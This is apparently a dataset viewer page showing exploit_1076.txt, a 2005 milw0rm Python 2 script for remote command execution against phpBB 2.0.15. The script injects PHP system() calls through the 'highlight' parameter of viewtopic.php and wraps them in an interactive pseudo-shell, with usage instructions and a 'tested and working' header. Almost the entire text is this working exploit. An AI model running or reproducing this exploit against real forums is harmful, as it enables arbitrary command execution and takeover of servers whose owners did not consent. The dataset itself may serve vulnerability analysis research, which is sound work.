Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1076.txt90 linesDownload Raw Back to exploits
1# tested and working /str0ke

2

3#!/usr/bin/pyth0n

4#

5###############################################################  this exploit for

6                                                              #  phpBB 2.0.15 

7print "\nphpBB 2.0.15 arbitrary command execution eXploit"    #  emulates a shell,

8print " 2005 by rattle@awarenetwork.org"                      #  rather than 

9print " well, just because there is none."                    #  sending a single

10                                                              #  command.

11import sys                                                 ####

12from urllib2 import Request, urlopen

13from urlparse import urlparse, urlunparse

14from urllib import quote as quote_plus

15

16INITTAG = '<g0>'

17ENDTAG  = '</g0>'

18

19def makecmd(cmd):

20    return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))

21

22

23_ex  = "%sviewtopic.php?t=%s&highlight=%%27."

24_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."

25_ex += "printf(" + makecmd(ENDTAG) + ").%%27"

26

27

28def usage():

29    print """Usage: %s <forum> <topic>

30 

31    forum - fully qualified url to the forum

32            example: http://www.host.com/phpBB/

33

34    topic - ID of an existing topic. Well you 

35            will have to check yourself.

36

37"""[:-1] % sys.argv[0]; sys.exit(1)

38

39

40if __name__ == '__main__':

41

42    if len(sys.argv) < 3 or not sys.argv[2].isdigit():

43        usage()

44    else:

45        print

46        url = sys.argv[1]

47        if url.count("://") == 0: 

48            url = "http://" + url

49        url = list(urlparse(url))

50        host = url[1]

51        if not host: usage()

52

53        if not url[0]: url[0] = 'http'

54        if not url[2]: url[2] = '/'

55        url[3] = url[4] = url[5] = ''

56

57        url = urlunparse(url)

58	if url[-1] != '/': url += '/'

59

60        topic = quote_plus((sys.argv[2]))

61

62        while 1:

63

64            try:

65                cmd = raw_input("[%s]$ " % host).strip()

66                if cmd[-1]==';': cmd=cmd[:-1]

67

68                if (cmd == "exit"): break

69                else: cmd = makecmd(cmd)

70		

71		out = _ex % (url,topic,cmd)

72

73                try: ret = urlopen(Request(out)).read()

74                except KeyboardInterrupt: continue

75                except: pass

76

77                else:

78                    ret = ret.split(INITTAG,1)

79                    if len(ret)>1: ret = ret[1].split(ENDTAG,1)

80                    if len(ret)>1:

81                        ret = ret[0].strip();

82                        if ret: print ret

83                        continue;

84

85                print "EXPLOIT FAILED"

86

87            except:

88                continue

89

90# milw0rm.com [2005-06-29]